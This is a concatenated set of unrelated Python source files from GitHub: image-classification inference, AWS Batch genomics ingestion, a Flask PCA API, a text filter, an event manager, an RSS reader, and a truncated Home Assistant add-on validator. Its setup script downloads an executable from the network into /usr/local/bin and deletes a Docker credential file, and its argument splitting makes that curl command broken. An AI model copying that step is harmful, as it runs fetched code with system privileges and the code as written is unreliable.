'_crop'+img_name)\n cv2.imwrite(save_name, crop_img)\n c_np_image = np.array(crop_img)/255\n mean = np.array([0.485, 0.456, 0.406])\n std = np.array([0.229, 0.224, 0.225])\n c_np_image = (c_np_image - mean) / std\n c_np_image = c_np_image.transpose((2, 0, 1))\n c_image = torch.Tensor(c_np_image).type(torch.cuda.FloatTensor)\n c_image = c_image.unsqueeze(0)\n output = model_c.forward(c_image)\n probabilities = torch.exp(output)\n top_probabilities, top_indices = probabilities.topk(3)\n\n # Convert to lists\n top_indices = top_indices.detach().type(torch.FloatTensor).numpy().tolist()[0] \n idx_to_class = {value: key for key, value in model_c.class_to_idx.items()}\n top = [idx_to_class[index] for index in top_indices]\n top = ' '.join(top)\n # top = food_id[top]\n print(\"... finish finding class!\")\n \n # edit view\n vis_text = \"Class:{}({:.2f})\".format(top, pred_scores[pred_i])\n '''\n # font 여기부터 안되면 삭제\n font = ImageFont.truetype('/home/haeun/21winter/NanumFont/NanumGothic.ttf', 2)\n img_arr = Image.fromarray(img_arr)\n draw = ImageDraw.Draw(img_arr)\n draw.text((x1+5, y1+15), vis_text, font=font, fill=color)\n img_arr = np.array(img_arr)\n \n 1. 탑3(o) -> 한줄에 하나씩 출력하는방법 ...\n 2. 색칠한상태로 됐을수도 있으니까 크롭한거 저장해보기 ***\n 3. cv2랑 numpy랑 인자가 다르니까 xy틀린건 없는지 확인해보기\n 4. 
크롭 안하고 numpy로 바로 슬라이싱해도 된다\n \n '''\n cv2.putText(img_arr, vis_text, (x1+5, y1+15), cv2.FONT_HERSHEY_SIMPLEX, 0.5, [255, 255, 255], 2)\n cv2.putText(img_arr, vis_text, (x1+5, y1+15), cv2.FONT_HERSHEY_SIMPLEX, 0.5, color, 1)\n \n # # save for debugging\n # cv2.imwrite(\"tmp_{}.png\".format(color_i), img_arr)\n print(\"... finish editing 1 box!\")\n # save visualized image\n img_arr = cv2.cvtColor(img_arr, cv2.COLOR_BGR2RGB)\n save_name = os.path.join(out_path, img_name)\n cv2.imwrite(save_name, img_arr)\n print(\"... finish editing 1 image!\")","repo_name":"12novel30/Food-Classification-And-Segmentation","sub_path":"week7/inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":7528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"42377647248","text":"#!/usr/bin/env python\n\nimport batchmetrics\nimport boto3\nimport click\nimport math\nimport sys\nimport tempfile\nimport os\n\n# Path and size of scratch directory in the tiledbvcf container.\nscratch_path = \"/data\"\nscratch_size_mb = 1000 * 1024 # 1TB\n\n\nclass JobInfo(object):\n \"\"\"Simple struct to contain batch job information.\"\"\"\n\n def __init__(\n self,\n client=None,\n job_queue=\"\",\n job_definition=\"\",\n depends_on=None,\n max_retries=1,\n metadata_s3=\"\",\n num_store_jobs=1,\n ):\n self.client = client\n self.job_queue = job_queue\n self.job_definition = job_definition\n self.max_retries = max_retries\n self.num_store_jobs = num_store_jobs\n self.metadata_s3 = metadata_s3\n if depends_on is not None:\n self.depends_on = depends_on\n else:\n self.depends_on = []\n\n def depends_on_as_dict(self):\n \"\"\"Returns the job dependencies list in a form that AWS can use.\"\"\"\n result = []\n for job_id in self.depends_on:\n result.append({\"jobId\": job_id, \"type\": \"SEQUENTIAL\"})\n return result\n\n\ndef upload_to_s3(local_file, s3_bucket):\n \"\"\"Upload the given local file to the given S3 bucket.\"\"\"\n s3 = boto3.resource(\"s3\")\n s3.meta.client.upload_file(local_file, s3_bucket, os.path.basename(local_file))\n return \"s3://\" + s3_bucket + \"/\" + os.path.basename(local_file)\n\n\ndef upload_sample_batches(sample_batches, s3_bucket):\n \"\"\"Creates and uploads one or more sample batch text files.\"\"\"\n uris = []\n for i, batch in enumerate(sample_batches):\n with tempfile.TemporaryDirectory() as tmpdir:\n basename = os.path.basename(tmpdir)\n tmpfile = os.path.join(tmpdir, \"samples_batch{}.{}.txt\".format(i, basename))\n with open(tmpfile, \"w\") as f:\n for line in batch:\n f.write(line)\n f.write(\"\\n\")\n uris.append(upload_to_s3(tmpfile, s3_bucket))\n return uris\n\n\ndef get_sample_batches(samples_file, num_batches):\n \"\"\"Return a list of sample batches.\n\n This returns a list containing num_batches lists of sample URIs.\n \"\"\"\n all_lines = []\n with open(samples_file, \"r\") as f:\n for line in f:\n line = line.strip()\n if len(line) > 0:\n all_lines.append(line)\n num_samples = len(all_lines)\n samples_per_batch = int(math.ceil(num_samples / float(num_batches)))\n batches = [\n all_lines[i : i + samples_per_batch]\n for i in range(0, num_samples, samples_per_batch)\n ]\n return batches\n\n\ndef get_incremental_samples_file(all_samples_file, i, num_partitions, tmpdir):\n \"\"\"Gets the ith incremental ingest portion of the given samples file.\n\n Partitions the samples in the given file into the ith partition and\n write the ith partition to a new file.\n \"\"\"\n with open(all_samples_file, \"r\") as in_f:\n lines = 
in_f.readlines()\n num_lines = len(lines)\n lines_per_part = int(math.ceil(num_lines / float(num_partitions)))\n start = i * lines_per_part\n end = min(num_lines, start + lines_per_part)\n\n lines = lines[start:end]\n if len(lines) == 0:\n return None\n\n basename = os.path.basename(tmpdir)\n path = os.path.join(tmpdir, \"{}.{}.txt\".format(i, basename))\n with open(path, \"w\") as out_f:\n out_f.writelines(lines)\n return path\n\n\ndef create_array(array_uri, attributes, job_info):\n \"\"\"Submit a Batch job to create the TileDB array.\"\"\"\n tilevcf_args = [\"create\", \"-u\", array_uri, \"-a\", attributes]\n # Configure the job requirements\n nvcpus = 16\n mem_req_mb = 60 * 1024\n response = job_info.client.submit_job(\n jobName=\"create_array\",\n jobQueue=job_info.job_queue,\n jobDefinition=job_info.job_definition,\n dependsOn=job_info.depends_on_as_dict(),\n containerOverrides={\n \"vcpus\": nvcpus,\n \"memory\": mem_req_mb,\n \"command\": tilevcf_args,\n },\n )\n job_id = response[\"jobId\"]\n print(\"Submitted array creation job {}\".format(job_id))\n return job_id\n\n\ndef register_samples(array_uri, samples_file, job_info):\n \"\"\"Submit a Batch job to register samples in the array before ingestion.\"\"\"\n samples_uri = upload_to_s3(samples_file, job_info.metadata_s3)\n tilevcf_args = [\n \"register\",\n \"-u\",\n array_uri,\n \"-d\",\n scratch_path,\n \"-s\",\n str(scratch_size_mb),\n \"-f\",\n samples_uri,\n ]\n # Configure the job requirements\n nvcpus = 16\n mem_req_mb = 60 * 1024\n response = job_info.client.submit_job(\n jobName=\"register_samples\",\n jobQueue=job_info.job_queue,\n jobDefinition=job_info.job_definition,\n dependsOn=job_info.depends_on_as_dict(),\n containerOverrides={\n \"vcpus\": nvcpus,\n \"memory\": mem_req_mb,\n \"command\": tilevcf_args,\n },\n )\n job_id = response[\"jobId\"]\n print(\n \"Submitted sample registration job {} using metadata {}\".format(\n job_id, samples_uri\n )\n )\n return job_id\n\n\ndef ingest_samples(array_uri, samples_file, job_info):\n \"\"\"Submit multiple Batch jobs to ingest all samples into the array.\"\"\"\n # Split up the work and upload the batches of sample URIs.\n samples_per_job = get_sample_batches(samples_file, job_info.num_store_jobs)\n sample_batch_uris = upload_sample_batches(samples_per_job, job_info.metadata_s3)\n\n # Configure the job requirements. Ingestion does not really benefit from\n # packing multiple jobs onto the same instance, so these requirements are\n # calibrated to use a full m5.4xlarge instance per job.\n nvcpus = 16\n mem_req_mb = 60000\n tilevcf_mem_gb = int(mem_req_mb / 1024)\n\n # Submit one job per sample batch.\n job_ids = []\n for batch_uri in sample_batch_uris:\n tilevcf_args = [\n \"store\",\n \"-u\",\n array_uri,\n \"-d\",\n scratch_path,\n \"-s\",\n str(scratch_size_mb),\n \"-t\",\n str(nvcpus),\n \"-f\",\n batch_uri,\n \"--remove-sample-file\",\n ]\n response = job_info.client.submit_job(\n jobName=\"ingest_samples\",\n jobQueue=job_info.job_queue,\n jobDefinition=job_info.job_definition,\n dependsOn=job_info.depends_on_as_dict(),\n retryStrategy={\"attempts\": job_info.max_retries},\n containerOverrides={\n \"vcpus\": nvcpus,\n \"memory\": mem_req_mb,\n \"command\": tilevcf_args,\n },\n )\n job_ids.append(response[\"jobId\"])\n\n print(\"Submitted ingestion job(s) {}\".format(\" \".join(job_ids)))\n return job_ids\n\n\n@click.command()\n@click.option(\n \"--dataset-uri\",\n required=True,\n help=\"S3 URI of destination TileDB-VCF dataset. 
If the dataset \"\n \"does not exist, it will be created.\",\n metavar=\"URI\",\n)\n@click.option(\n \"--samples\",\n required=True,\n help=\"Path to file containing a list of sample URIs (one per\" \" line) to ingest.\",\n metavar=\"PATH\",\n)\n@click.option(\n \"--metadata-s3\",\n required=True,\n help=\"Name of a bucket that can be used for shared metadata \"\n \"storage between batch jobs, e.g. uploading lists of \"\n \"samples to register or ingest.\",\n metavar=\"NAME\",\n)\n@click.option(\n \"--job-queue\",\n required=True,\n help=\"Name of job queue to use for jobs.\",\n metavar=\"NAME\",\n)\n@click.option(\n \"--job-definition\",\n required=True,\n help=\"Name of job definition to use for jobs.\",\n metavar=\"NAME\",\n)\n@click.option(\n \"--attributes\",\n help=\"Comma-separated list of VCF info and/or format field names \"\n \"that should be extracted as separate TileDB attributes. \"\n \"This option is only used if the destination array does not \"\n \"yet exist.\",\n default=\"fmt_GT,fmt_DP,fmt_GQ,fmt_MIN_DP\",\n metavar=\"CSV\",\n)\n@click.option(\n \"--num-jobs\",\n default=1,\n help=\"Number of jobs to submit for ingestion. Each job will be \"\n \"responsible for ingesting nsamples/njobs samples to the \"\n \"array. When combined with --incremental, each incremental \"\n \"batch uses this many jobs.\",\n metavar=\"N\",\n)\n@click.option(\n \"--region\",\n help=\"AWS region name of Batch environment\",\n default=\"us-east-1\",\n metavar=\"NAME\",\n)\n@click.option(\n \"--retries\",\n help=\"Max number (1-10) of retries for failed jobs.\",\n default=1,\n metavar=\"N\",\n)\n@click.option(\n \"--wait\", help=\"Waits for all jobs to complete before exiting.\", is_flag=True\n)\n@click.option(\n \"--incremental\",\n default=1,\n metavar=\"N\",\n help=\"If specified, ingest the samples in N batches instead of \" \"all at once.\",\n)\ndef main(\n dataset_uri,\n samples,\n attributes,\n job_queue,\n job_definition,\n region,\n metadata_s3,\n num_jobs,\n retries,\n wait,\n incremental,\n):\n \"\"\"Ingest VCF sample data into a TileDB-VCF dataset via AWS Batch.\n\n This script requires an existing AWS Batch setup, including a job definition\n with a Docker image containing the TileDB-VCF CLI executable. The CLI\n executable is invoked in each batch job by this script using the `command`\n container override parameter.\n\n Ingestion of the samples (specified via --samples argument) is distributed\n across the specified number of Batch jobs (--num-jobs), irrespective of\n the number of instances in the compute environment. For example, if there\n are 1,000 samples to be ingested, the compute environment contains 10\n instances, and 10 jobs are requested, each instance will execute 1 job that\n ingests 100 samples at a time. 
If 100 jobs were requested, 100 jobs would be\n queued (each ingesting 10 samples), and the 10 instances would pull jobs\n from the queue until all are finished.\n\n The bucket specified with the --metadata-s3 argument is used to store a file\n for each job containing the list of samples the job should ingest.\n \"\"\"\n\n job_info = JobInfo(\n job_queue=job_queue,\n job_definition=job_definition,\n client=boto3.client(\"batch\", region_name=region),\n max_retries=retries,\n num_store_jobs=num_jobs,\n metadata_s3=metadata_s3,\n )\n create_job_id = create_array(dataset_uri, attributes, job_info)\n\n for i in range(0, incremental):\n with tempfile.TemporaryDirectory() as tmpdir:\n batch_samples = get_incremental_samples_file(\n samples, i, incremental, tmpdir\n )\n\n # Check for empty list of samples\n if batch_samples is None:\n continue\n\n job_info.depends_on = [create_job_id] if i == 0 else []\n register_job_id = register_samples(dataset_uri, batch_samples, job_info)\n\n job_info.depends_on = [register_job_id]\n job_ids = ingest_samples(dataset_uri, batch_samples, job_info)\n\n if wait:\n # Registration stats\n name = \"registration {} of {}\".format(i + 1, incremental)\n stats = batchmetrics.wait_all(\n [register_job_id], job_info.client, job_name=name\n )\n batchmetrics.print_stats_report(stats, instance_price_per_hr=0.768)\n\n # Ingest stats\n name = \"ingestion {} of {}\".format(i + 1, incremental)\n stats = batchmetrics.wait_all(job_ids, job_info.client, job_name=name)\n batchmetrics.print_stats_report(stats, instance_price_per_hr=0.768)\n if stats[\"num_succeeded\"] != stats[\"num_jobs\"]:\n sys.exit(1)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"glycoaddict/djangotileremotedev","sub_path":"TileDB-VCF/apis/aws-batch/batch-ingest.py","file_name":"batch-ingest.py","file_ext":"py","file_size_in_byte":11817,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"34857757700","text":"from rnavis import app\nfrom flask_restful import Resource, Api, reqparse\nimport pandas\nimport rnavis.gene_expression as ge\nimport sqlalchemy as sql\nimport psycopg2 # needs to imported because sqlalchemy uses it by default\nimport os\napi = Api(app)\n\npost_parser = reqparse.RequestParser()\npost_parser.add_argument('schema', dest='schema', required=True,\n location='json',\n help='The schema representing experiment name')\npost_parser.add_argument('table', dest='table', required=True, location='json',\n help='Table name with count data')\npost_parser.add_argument('batch', dest='batch', required=False,\n location='json',\n help='list of ints which specify batch')\n\nengine = os.environ.get(\"ENGINE\")\nengine = sql.create_engine(engine)\n\nmm = ge.matrix_manipulation()\n\n\nclass pca_points(Resource):\n\n def post(self):\n args = post_parser.parse_args()\n\n if args.batch:\n try:\n matrix_name = args.schema + '_' + args.table\n mm.make_batch_matrix(batch_list=list(args.batch),\n name=matrix_name)\n results = ge.pca_json(mm.get_batch_matrix(name=matrix_name))\n except KeyError:\n print(\"need voom normalized matrix before batch correcting\")\n else:\n try:\n matrix_name = args.schema + '_' + args.table\n results = ge.pca_json(mm.get_norm_matrix(name=matrix_name))\n except KeyError:\n if args.table == 'gene counts':\n table_name = \"protein_gene_counts\"\n if args.table == 'nascent counts':\n table_name = \"protein_intron_counts\"\n counts = pandas.read_sql_table(table_name,\n index_col='Gene',\n con=engine,\n schema=args.schema)\n 
mm.add_counts_matrix(name=matrix_name, counts_matrix=counts)\n results = ge.pca_json(mm.get_norm_matrix(name=matrix_name))\n return results.to_dict(orient='records')\n\napi.add_resource(pca_points, '/data')\n","repo_name":"JakeHagen/rnavis","sub_path":"rnavis/matrix_manip_api.py","file_name":"matrix_manip_api.py","file_ext":"py","file_size_in_byte":2277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"27340205694","text":"import re\n\n\nclass ChineseFilter:\n @staticmethod\n def filterText(s: str) -> list:\n texts = [u\"啊a1446呃呃OK⭕🎶步品破茶\",\n u\"点击http://www.hikki.top网址\",\n u\"链接ed2k://|file|dld-021.avi|1016078437|620703E6CD6F00BF67102544D6BB00C4|/\",\n u\"啊啊啊✨ ​​​好🌹\",\n s]\n pattern = re.compile(r\"[^\\x00-\\xff\\u200b]\", )\n emojiPattern = re.compile(r\"[\\u4e00-\\u9fa5]\", )\n res = []\n for text in texts:\n temp = pattern.findall(text)# 筛选掉单个的16进制字符\n textWithEmoji = \"\"\n for i in temp: textWithEmoji += i\n\n chinese = \"\"\n for i in emojiPattern.findall(textWithEmoji): chinese += i\n\n # 如果没其他语言的话,emojiPattern.split(textWithEmoji)也可以\n textEmoji = \"\"\n for i in re.findall(\"[^\\u4e00-\\u9fa5ぁ-んァ-ン]\", textWithEmoji): textEmoji += i\n\n jp=\"\"\n for i in re.findall(\"[ぁ-んァ-ン]\", textWithEmoji): jp +=i\n\n dic = {\"text\": chinese, \"emoji\": textEmoji}\n if jp !=\"\" : dic[\"others\"] = jp\n\n res.append(dic)\n return res\n","repo_name":"FoVNull/NLPDemo_py","sub_path":"Cleaning/ChineseDemo.py","file_name":"ChineseDemo.py","file_ext":"py","file_size_in_byte":1225,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"27827918837","text":"import pandas as pd\r\nimport csv\r\n\r\nimport logger\r\n\r\n\r\nclass Event:\r\n event_list = []\r\n def __init__(self, id_event, name_event, date_event, time_event, place_event, cost_event, total_capacity,\r\n flag_event=1):\r\n \"\"\"\r\n this class create a event buy admin\r\n id_event:\r\n name_event: name of event\r\n date_event: date of event\r\n time_event: time of event\r\n place_event: place of event\r\n cost_event: cost of event\r\n total_capacity: total capacity\r\n mod_total_capacity: mod of capacity\r\n flag_event: event live or not\r\n \"\"\"\r\n self.id_event = id_event\r\n self.name_event = name_event\r\n self.date_event = date_event\r\n self.time_event = time_event\r\n self.place_event = place_event\r\n self.cost_event = cost_event\r\n self.total_capacity = total_capacity\r\n self.mod_total_capacity = total_capacity\r\n self.flag_event = 1\r\n\r\n\r\n @staticmethod\r\n def event_():\r\n path_file = \"event.csv\"\r\n df_id_event = pd.read_csv(path_file)\r\n list_id_event = []\r\n while True:\r\n\r\n id_event = input(\" enter id_event: \")\r\n if id_event in list_id_event:\r\n print(\"the id_event is already taken\")\r\n elif id_event == \"\":\r\n print(\"ERROR: your input id is blank\")\r\n else:\r\n list_id_event.append(id_event)\r\n break\r\n\r\n name_event = input(\" enter name_event: \")\r\n date_event = input(\" enter date_event: \")\r\n time_event = input(\" enter time_event: \")\r\n place_event = input(\"enter place_event: \")\r\n cost_event = input(\"enter cost_event: \")\r\n total_capacity = input(\"enter total_capacity: \")\r\n flag_event = 1\r\n\r\n\r\n\r\n\r\n obj_event = Event(id_event, name_event, date_event, time_event, place_event, cost_event, total_capacity,flag_event)\r\n Event.event_list.append(obj_event)\r\n # path_file = \"event.csv\"\r\n row = 
[[id_event,name_event,date_event,time_event,place_event,cost_event,total_capacity, obj_event.mod_total_capacity,flag_event]]\r\n with open(path_file, 'a', newline='') as csv_show_event:\r\n csv_writer = csv.writer(csv_show_event)\r\n csv_writer.writerows(row)\r\n # logger.info_logger.info(f'{name_event} is created')\r\n return obj_event\r\n\r\n# event1=Event.event_()\r\n\r\ndef show_event():\r\n path_file = \"event.csv\"\r\n # file = open(path_file)\r\n df_show_event = pd.read_csv(path_file)\r\n print(df_show_event)\r\n\r\n\r\n\r\ndef choose_event(ev_id):\r\n with open(\"event.csv\", 'r') as reader_obj:\r\n csv_reader = csv.DictReader(reader_obj)\r\n # line_count = 0\r\n for row in csv_reader:\r\n if row['id_event'] == str(ev_id):\r\n for key, value in row.items():\r\n print(value, end=' ')\r\n # print(row)\r\n\r\n\r\n\r\n\r\n\r\ndef update_capacity():\r\n update_total_capacity = pd.read_csv(\"event.csv\")\r\n print(update_total_capacity)\r\n location = 0\r\n eventID = input('Enter the id here:')\r\n with open(\"event.csv\", 'r') as my_file:\r\n csv_reader = csv.DictReader(my_file)\r\n for row in csv_reader:\r\n if row['id_event'] == eventID:\r\n capacity = input('Enter capacity:')\r\n row['total_capacity'] = capacity\r\n update_total_capacity.loc[location, 'total_capacity'] = capacity\r\n update_total_capacity.to_csv(\"event.csv\", index=False)\r\n location += 1\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"somaye-amraee/somayeProject1","sub_path":"maktab_51_hw_final_somaye_amraei/event1.py","file_name":"event1.py","file_ext":"py","file_size_in_byte":3596,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"34173962390","text":"import feedparser\nimport logging\n\nfrom rss.rss_feed.feed_url import Technology\n\n\nclass RSSRead:\n\n def read_entries(self, link):\n try:\n res = feedparser.parse(link)\n return res['entries']\n except Exception as exe:\n logging.exception(exe)\n\n def get_data(self, entries):\n result = []\n for entry in entries:\n _data = {}\n _data['link'] = entry['link']\n _data['title'] = entry['title']\n result.append(_data)\n return result\n\n def construct_data(self):\n data = {}\n for key, value in Technology.TECHNOLOGY_URLS.items():\n entries = self.read_entries(value)\n data[key] = self.get_data(entries)\n return data\n\nif __name__ == \"__main__\":\n rss = RSSRead()\n print(rss.construct_data())\n","repo_name":"SowmyaLR/RSSFeed","sub_path":"rss/rss_feed/rss_read.py","file_name":"rss_read.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"43883853571","text":"import subprocess\nimport sys\n\n\ndef setup():\n process = subprocess.Popen(\"\"\"/sbin/ip route|awk '/default/{print$3}'\"\"\", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n out, err = process.communicate()\n if err.decode('ascii').strip() != \"\":\n sys.exit(err)\n host = out.decode('ascii').strip()\n create_env_file(host)\n\n install_docker_compose()\n subprocess.run(to_args(\"rm ~/.docker/config.json\"))\n subprocess.run(to_args(\"docker-compose up\"))\n\n\ndef create_env_file(host: str):\n line = \"HOST = \" + host\n with open(\".env\", 'w+') as f:\n f.write(line)\n print(\".env created with \" + line)\n\n\ndef install_docker_compose():\n process = subprocess.Popen(to_args(\"docker-compose --version\"), stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n out, err = process.communicate()\n if \"docker-compose\" in out.decode('ascii') 
and \"version\" in out.decode('ascii'):\n return\n subprocess.run(to_args(\"\"\"curl -L \"https://github.com/docker/compose/releases/download/1.28.3/docker-compose-$(uname -s)-$(uname -m)\" -o /usr/local/bin/docker-compose\"\"\"))\n subprocess.run(to_args(\"chmod +x /usr/local/bin/docker-compose\"))\n\n\ndef to_args(command: str):\n return command.split(\" \")\n\n\nif __name__ == \"__main__\":\n setup()","repo_name":"Seris370/Pub-Sub-Messaging","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"23867647125","text":"\"\"\"Validate add-ons options schema.\"\"\"\nimport logging\nimport re\nimport secrets\nfrom typing import Any\nimport uuid\n\nimport voluptuous as vol\n\nfrom ..const import (\n ARCH_ALL,\n ATTR_ACCESS_TOKEN,\n ATTR_ADVANCED,\n ATTR_APPARMOR,\n ATTR_ARCH,\n ATTR_ARGS,\n ATTR_AUDIO,\n ATTR_AUDIO_INPUT,\n ATTR_AUDIO_OUTPUT,\n ATTR_AUTH_API,\n ATTR_AUTO_UPDATE,\n ATTR_BACKUP_EXCLUDE,\n ATTR_BACKUP_POST,\n ATTR_BACKUP_PRE,\n ATTR_BOOT,\n ATTR_BUILD_FROM,\n ATTR_CONFIGURATION,\n ATTR_DESCRIPTON,\n ATTR_DEVICES,\n ATTR_DEVICETREE,\n ATTR_DISCOVERY,\n ATTR_DOCKER_API,\n ATTR_ENVIRONMENT,\n ATTR_FULL_ACCESS,\n ATTR_GPIO,\n ATTR_HASSIO_API,\n ATTR_HASSIO_ROLE,\n ATTR_HOMEASSISTANT,\n ATTR_HOMEASSISTANT_API,\n ATTR_HOST_DBUS,\n ATTR_HOST_IPC,\n ATTR_HOST_NETWORK,\n ATTR_HOST_PID,\n ATTR_HOST_UTS,\n ATTR_IMAGE,\n ATTR_INGRESS,\n ATTR_INGRESS_ENTRY,\n ATTR_INGRESS_PANEL,\n ATTR_INGRESS_PORT,\n ATTR_INGRESS_STREAM,\n ATTR_INGRESS_TOKEN,\n ATTR_INIT,\n ATTR_JOURNALD,\n ATTR_KERNEL_MODULES,\n ATTR_LABELS,\n ATTR_LEGACY,\n ATTR_LOCATON,\n ATTR_MACHINE,\n ATTR_MAP,\n ATTR_NAME,\n ATTR_NETWORK,\n ATTR_OPTIONS,\n ATTR_PANEL_ADMIN,\n ATTR_PANEL_ICON,\n ATTR_PANEL_TITLE,\n ATTR_PORTS,\n ATTR_PORTS_DESCRIPTION,\n ATTR_PRIVILEGED,\n ATTR_PROTECTED,\n ATTR_REALTIME,\n ATTR_REPOSITORY,\n ATTR_SCHEMA,\n ATTR_SERVICES,\n ATTR_SLUG,\n ATTR_SQUASH,\n ATTR_STAGE,\n ATTR_STARTUP,\n ATTR_STATE,\n ATTR_STDIN,\n ATTR_SYSTEM,\n ATTR_TIMEOUT,\n ATTR_TMPFS,\n ATTR_TRANSLATIONS,\n ATTR_UART,\n ATTR_UDEV,\n ATTR_URL,\n ATTR_USB,\n ATTR_USER,\n ATTR_UUID,\n ATTR_VERSION,\n ATTR_VIDEO,\n ATTR_WATCHDOG,\n ATTR_WEBUI,\n ROLE_ALL,\n ROLE_DEFAULT,\n AddonBoot,\n AddonStage,\n AddonStartup,\n AddonState,\n)\nfrom ..discovery.validate import valid_discovery_service\nfrom ..docker.const import Capabilities\nfrom ..validate import (\n docker_image,\n docker_ports,\n docker_ports_description,\n network_port,\n token,\n uuid_match,\n version_tag,\n)\nfrom .const import ATTR_BACKUP, ATTR_CODENOTARY, RE_SLUG, AddonBackupMode\nfrom .options import RE_SCHEMA_ELEMENT\n\n_LOGGER: logging.Logger = logging.getLogger(__name__)\n\nRE_VOLUME = re.compile(r\"^(config|ssl|addons|backup|share|media)(?::(rw|ro))?$\")\nRE_SERVICE = re.compile(r\"^(?Pmqtt|mysql):(?Pprovide|want|need)$\")\n\n\nRE_DOCKER_IMAGE_BUILD = re.compile(\n r\"^([a-zA-Z\\-\\.:\\d{}]+/)*?([\\-\\w{}]+)/([\\-\\w{}]+)(:[\\.\\-\\w{}]+)?$\"\n)\n\nSCHEMA_ELEMENT = vol.Match(RE_SCHEMA_ELEMENT)\n\nRE_MACHINE = re.compile(\n r\"^!?(?:\"\n r\"|intel-nuc\"\n r\"|generic-x86-64\"\n r\"|odroid-c2\"\n r\"|odroid-c4\"\n r\"|odroid-m1\"\n r\"|odroid-n2\"\n r\"|odroid-xu\"\n r\"|qemuarm-64\"\n r\"|qemuarm\"\n r\"|qemux86-64\"\n r\"|qemux86\"\n r\"|raspberrypi\"\n r\"|raspberrypi2\"\n r\"|raspberrypi3-64\"\n r\"|raspberrypi3\"\n r\"|raspberrypi4-64\"\n r\"|raspberrypi4\"\n r\"|yellow\"\n r\"|green\"\n r\"|tinker\"\n r\")$\"\n)\n\nRE_SLUG_FIELD = 
re.compile(r\"^\" + RE_SLUG + r\"$\")\n\n\ndef _warn_addon_config(config: dict[str, Any]):\n \"\"\"Warn about miss configs.\"\"\"\n name = config.get(ATTR_NAME)\n if not name:\n raise vol.Invalid(\"Invalid Add-on config!\")\n\n if config.get(ATTR_FULL_ACCESS, False) and (\n config.get(ATTR_DEVICES)\n or config.get(ATTR_UART)\n or config.get(ATTR_USB)\n or config.get(ATTR_GPIO)\n ):\n _LOGGER.warning(\n \"Add-on have full device access, and selective device access in the configuration. Please report this to the maintainer of %s\",\n name,\n )\n\n if config.get(ATTR_BACKUP, AddonBackupMode.HOT) == AddonBackupMode.COLD and (\n config.get(ATTR_BACKUP_POST) or config.get(ATTR_BACKUP_PRE)\n ):\n _LOGGER.warning(\n \"Add-on which only support COLD backups trying to use post/pre commands. Please report this to the maintainer of %s\",\n name,\n )\n\n invalid_services: list[str] = []\n for service in config.get(ATTR_DISCOVERY, []):\n try:\n valid_discovery_service(service)\n except vol.Invalid:\n invalid_services.append(service)\n\n if invalid_services:\n _LOGGER.warning(\n \"Add-on lists the following unknown services for discovery: %s. Please report this to the maintainer of %s\",\n \", \".join(invalid_services),\n name,\n )\n\n return config\n\n\ndef _migrate_addon_config(protocol=False):\n \"\"\"Migrate addon config.\"\"\"\n\n def _migrate(config: dict[str, Any]):\n name = config.get(ATTR_NAME)\n if not name:\n raise vol.Invalid(\"Invalid Add-on config!\")\n\n # Startup 2018-03-30\n if config.get(ATTR_STARTUP) in (\"before\", \"after\"):\n value = config[ATTR_STARTUP]\n if protocol:\n _LOGGER.warning(\n \"Add-on config 'startup' with '%s' is deprecated. Please report this to the maintainer of %s\",\n value,\n name,\n )\n if value == \"before\":\n config[ATTR_STARTUP] = AddonStartup.SERVICES\n elif value == \"after\":\n config[ATTR_STARTUP] = AddonStartup.APPLICATION\n\n # UART 2021-01-20\n if \"auto_uart\" in config:\n if protocol:\n _LOGGER.warning(\n \"Add-on config 'auto_uart' is deprecated, use 'uart'. Please report this to the maintainer of %s\",\n name,\n )\n config[ATTR_UART] = config.pop(\"auto_uart\")\n\n # Device 2021-01-20\n if ATTR_DEVICES in config and any(\":\" in line for line in config[ATTR_DEVICES]):\n if protocol:\n _LOGGER.warning(\n \"Add-on config 'devices' use a deprecated format, the new format uses a list of paths only. Please report this to the maintainer of %s\",\n name,\n )\n config[ATTR_DEVICES] = [line.split(\":\")[0] for line in config[ATTR_DEVICES]]\n\n # TMPFS 2021-02-01\n if ATTR_TMPFS in config and not isinstance(config[ATTR_TMPFS], bool):\n if protocol:\n _LOGGER.warning(\n \"Add-on config 'tmpfs' use a deprecated format, new it's only a boolean. Please report this to the maintainer of %s\",\n name,\n )\n config[ATTR_TMPFS] = True\n\n # 2021-06 \"snapshot\" renamed to \"backup\"\n for entry in (\n \"snapshot_exclude\",\n \"snapshot_post\",\n \"snapshot_pre\",\n \"snapshot\",\n ):\n if entry in config:\n new_entry = entry.replace(\"snapshot\", \"backup\")\n config[new_entry] = config.pop(entry)\n _LOGGER.warning(\n \"Add-on config '%s' is deprecated, '%s' should be used instead. 
